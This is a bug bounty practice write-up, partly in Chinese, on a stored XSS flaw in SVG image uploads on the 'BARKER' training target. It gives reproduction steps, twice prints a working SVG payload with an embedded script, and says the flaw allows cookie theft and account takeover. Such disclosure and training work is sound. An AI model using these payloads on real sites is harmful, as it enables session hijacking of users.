bugbountyhunter scope BARKER：第九滴血 存储型 Storage Cross-Site Scripting XSS 头像处SVG文件上传 报告

登录后来到My profile页面，页面里存在一个Edit Profile

头像处可以上传SVG图片
检查 xss payload：https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection#xss-in-files

使用SVG进行图片上传，发现SVG文件上传成功并返回图片地址

poc:https://cfceb12f2bfd-sec875.a.barker-social.com/storage/EJvryUYazZY0PJSwKxFL9D1IPXD2DQtKie8g1Qcv.svg

英哥历史报告

l have discovered a Storage XSS vulnerability affecting the endpoint 'https://cfceb12f2bfd-sec875.a.barker-social.com/post' in the parameter 'post_image'. The payloed requires no filter bypass and is a simple, ' <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script>
</svg> 'You can see a working proof of concept here:https://cfceb12f2bfd-sec875.a.barker-social.com/storage/a23wZID1s0agMIDiLZqDzuJGxTZUA2osuxoYwhtU.svg![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367330/cbohfhn7zh7ubv3plmcc.png)To reproduce:
1.After logging in, you will come to the home page. There is an Attach image in the message.![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367398/cajsidqey3up2g6ke99v.png)2.Check xss payload: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection#xss-in-files![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367471/ayhhkvw7ugkx5eossb04.png)3.Use SVG to upload pictures. It is found that the SVG file is uploaded successfully and the picture address is returned.![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367855/mmvkxsjmpd3ktefnsvae.png)![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367534/t4d7fegeelnyhl9bgacj.png)4.You will observe xss executeshttps://cfceb12f2bfd-sec875.a.barker-social.com/storage/a23wZID1s0agMIDiLZqDzuJGxTZUA2osuxoYwhtU.svg![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367330/cbohfhn7zh7ubv3plmcc.png)Payload used: <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script>
</svg>Vulnerable parameter: post_image
Endpoint/URL: https://cfceb12f2bfd-sec875.a.barker-social.com/postlmpact:
As the sessin cookies are not protected by HTTPOnly. we can obtain these and achieve account takeover. As well as this,the CSRF token is stored the DOM which enables us to easily perform actions on behalf of the user.